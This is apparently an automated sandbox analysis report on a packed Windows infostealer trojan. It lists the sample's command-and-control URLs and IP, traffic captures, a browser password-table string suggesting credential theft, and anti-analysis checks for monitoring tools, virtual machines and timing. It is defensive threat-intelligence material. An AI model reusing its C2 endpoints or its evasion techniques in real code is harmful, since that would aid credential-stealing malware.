                Source: pPizCGDvrx.exe, pPizCGDvrx.exe, 00000000.00000003.1437780478.000000000115A000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1547189267.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000002.1756296489.0000000001158000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1754892767.0000000001158000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1755223714.0000000001158000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1600613999.00000000011D9000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1546879090.00000000011EC000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1603018790.00000000011D9000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1437659594.0000000001158000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1600571554.00000000011E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/api
                Source: pPizCGDvrx.exe, 00000000.00000002.1756690646.00000000011ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/api6
                Source: pPizCGDvrx.exe, 00000000.00000003.1437780478.000000000115A000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1437659594.0000000001158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/apiG
                Source: pPizCGDvrx.exe, 00000000.00000003.1437780478.000000000115A000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1437659594.0000000001158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/apigsA
                Source: pPizCGDvrx.exe, 00000000.00000003.1671204983.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000002.1756690646.00000000011ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/apiz
                Source: pPizCGDvrx.exe, 00000000.00000002.1756296489.0000000001158000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1754892767.0000000001158000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1755223714.0000000001158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/apiz0y
                Source: pPizCGDvrx.exe, 00000000.00000003.1437780478.000000000115A000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1437659594.0000000001158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/s
                Source: pPizCGDvrx.exe, 00000000.00000003.1755109523.00000000011B1000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1657908110.00000000011B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat:443/api
                Source: pPizCGDvrx.exe, 00000000.00000003.1755353022.00000000011BE000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000002.1756627823.00000000011BF000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1755109523.00000000011B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat:443/apitA
                Source: pPizCGDvrx.exe, 00000000.00000003.1549012644.0000000005A60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
                Source: pPizCGDvrx.exe, 00000000.00000003.1548557510.0000000005B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: pPizCGDvrx.exe, 00000000.00000003.1548557510.0000000005B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: pPizCGDvrx.exe, 00000000.00000003.1549012644.0000000005A60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
                Source: pPizCGDvrx.exe, 00000000.00000003.1438509200.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438578536.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438368607.0000000005A9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: pPizCGDvrx.exe, 00000000.00000003.1438509200.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438578536.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438368607.0000000005A9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: pPizCGDvrx.exe, 00000000.00000003.1549012644.0000000005A60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                Source: pPizCGDvrx.exe, 00000000.00000003.1548557510.0000000005B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
                Source: pPizCGDvrx.exe, 00000000.00000003.1548557510.0000000005B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
                Source: pPizCGDvrx.exe, 00000000.00000003.1548557510.0000000005B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
                Source: pPizCGDvrx.exe, 00000000.00000003.1548557510.0000000005B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: pPizCGDvrx.exe, 00000000.00000003.1548557510.0000000005B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.7:49700 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.7:49702 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.7:49723 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.7:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.7:49754 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.7:49765 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.7:49781 version: TLS 1.2

                System Summary

                barindex
                PE file contains section with special chars
                Source: pPizCGDvrx.exeStatic PE information: section name:
                Source: pPizCGDvrx.exeStatic PE information: section name: .idata
                Source: pPizCGDvrx.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeCode function: 0_3_011628890_3_01162889
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeCode function: 0_3_011628D40_3_011628D4
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeCode function: 0_3_01162B790_3_01162B79
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeCode function: 0_3_011628890_3_01162889
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeCode function: 0_3_011628D40_3_011628D4
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeCode function: 0_3_01162B790_3_01162B79
                Source: pPizCGDvrx.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: pPizCGDvrx.exeStatic PE information: Section: ZLIB complexity 0.9974114404965754
                Source: pPizCGDvrx.exeStatic PE information: Section: iottbtod ZLIB complexity 0.9948973730117047
                Source: pPizCGDvrx.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@2/1
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: pPizCGDvrx.exe, 00000000.00000003.1439169970.0000000005A6E000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438846358.0000000005A89000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1488174729.0000000005A92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: pPizCGDvrx.exeReversingLabs: Detection: 57%
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile read: C:\Users\user\Desktop\pPizCGDvrx.exeJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: pPizCGDvrx.exeStatic file information: File size 1871360 > 1048576
                Source: pPizCGDvrx.exeStatic PE information: Raw size of iottbtod is bigger than: 0x100000 < 0x1a0800

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeUnpacked PE file: 0.2.pPizCGDvrx.exe.bc0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;iottbtod:EW;ugfsaeak:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;iottbtod:EW;ugfsaeak:EW;.taggant:EW;
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: pPizCGDvrx.exeStatic PE information: real checksum: 0x1d57d1 should be: 0x1d731c
                Source: pPizCGDvrx.exeStatic PE information: section name:
                Source: pPizCGDvrx.exeStatic PE information: section name: .idata
                Source: pPizCGDvrx.exeStatic PE information: section name:
                Source: pPizCGDvrx.exeStatic PE information: section name: iottbtod
                Source: pPizCGDvrx.exeStatic PE information: section name: ugfsaeak
                Source: pPizCGDvrx.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeCode function: 0_3_011C897A push ecx; retf 0_3_011C89A0
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeCode function: 0_3_011E6D64 push esi; retf 0_3_011E6D67
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeCode function: 0_3_011E6D64 push esi; retf 0_3_011E6D67
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeCode function: 0_3_0115E511 pushfd ; retf 0_3_0115E512
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeCode function: 0_3_0115E511 pushfd ; retf 0_3_0115E512
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeCode function: 0_3_0115D1C0 push ebx; iretd 0_3_0115D1C3
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeCode function: 0_3_0115D1C0 push ebx; iretd 0_3_0115D1C3
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeCode function: 0_3_0115D1CD push ebx; iretd 0_3_0115D1BB
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeCode function: 0_3_0115D1CD push ebx; iretd 0_3_0115D1BB
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeCode function: 0_3_0115CFE2 push ebx; iretd 0_3_0115D1BB
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeCode function: 0_3_0115CFE2 push ebx; iretd 0_3_0115D1BB
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeCode function: 0_3_0115E511 pushfd ; retf 0_3_0115E512
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeCode function: 0_3_0115E511 pushfd ; retf 0_3_0115E512
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeCode function: 0_3_0115D1C0 push ebx; iretd 0_3_0115D1C3
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeCode function: 0_3_0115D1C0 push ebx; iretd 0_3_0115D1C3
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeCode function: 0_3_0115D1CD push ebx; iretd 0_3_0115D1BB
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeCode function: 0_3_0115D1CD push ebx; iretd 0_3_0115D1BB
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeCode function: 0_3_0115CFE2 push ebx; iretd 0_3_0115D1BB
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeCode function: 0_3_0115CFE2 push ebx; iretd 0_3_0115D1BB
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeCode function: 0_3_05A62FC6 push ds; iretd 0_3_05A62FC4
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeCode function: 0_3_05A62F70 push ds; iretd 0_3_05A62FC4
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeCode function: 0_3_011E6D64 push esi; retf 0_3_011E6D67
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeCode function: 0_3_011E6D64 push esi; retf 0_3_011E6D67
                Source: pPizCGDvrx.exeStatic PE information: section name: entropy: 7.978884009645504
                Source: pPizCGDvrx.exeStatic PE information: section name: iottbtod entropy: 7.953350662894027

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Query firmware table information (likely to detect VMs)
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeSystem information queried: FirmwareTableInformationJump to behavior
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: C18484 second address: C1848B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: C1848B second address: C18491 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: C18491 second address: C18495 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D95266 second address: D9528A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jg 00007F2A2CEBE356h 0x0000000c pop eax 0x0000000d jl 00007F2A2CEBE364h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D9528A second address: D952AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A2C61915Bh 0x00000009 jmp 00007F2A2C61915Ah 0x0000000e popad 0x0000000f popad 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D953F7 second address: D953FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D953FC second address: D9541C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jmp 00007F2A2C61915Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jg 00007F2A2C61918Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 push esi 0x00000019 pop esi 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D9541C second address: D95430 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2A2CEBE356h 0x00000008 jc 00007F2A2CEBE356h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D955AB second address: D955B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D955B1 second address: D955B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D95718 second address: D9572B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A2C61915Bh 0x00000009 pop esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D9572B second address: D9573E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F2A2CEBE356h 0x0000000a push eax 0x0000000b pop eax 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D959C5 second address: D959C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D959C9 second address: D959D8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D959D8 second address: D95A0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2C619168h 0x00000007 jnl 00007F2A2C619156h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F2A2C619165h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D95B8A second address: D95BA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A2CEBE368h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D98017 second address: D98039 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2C619163h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F2A2C619158h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D98039 second address: D9805E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE368h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D98102 second address: D98123 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jno 00007F2A2C619160h 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D98123 second address: D98127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D98127 second address: D9812B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D9812B second address: D98158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007F2A2CEBE365h 0x00000012 jns 00007F2A2CEBE356h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D9829A second address: D9829F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D9829F second address: D98322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F2A2CEBE358h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 sbb esi, 1DE206E0h 0x00000028 push 00000000h 0x0000002a jnc 00007F2A2CEBE35Ch 0x00000030 call 00007F2A2CEBE359h 0x00000035 jl 00007F2A2CEBE384h 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f push edi 0x00000040 pop edi 0x00000041 jl 00007F2A2CEBE356h 0x00000047 popad 0x00000048 rdtsc
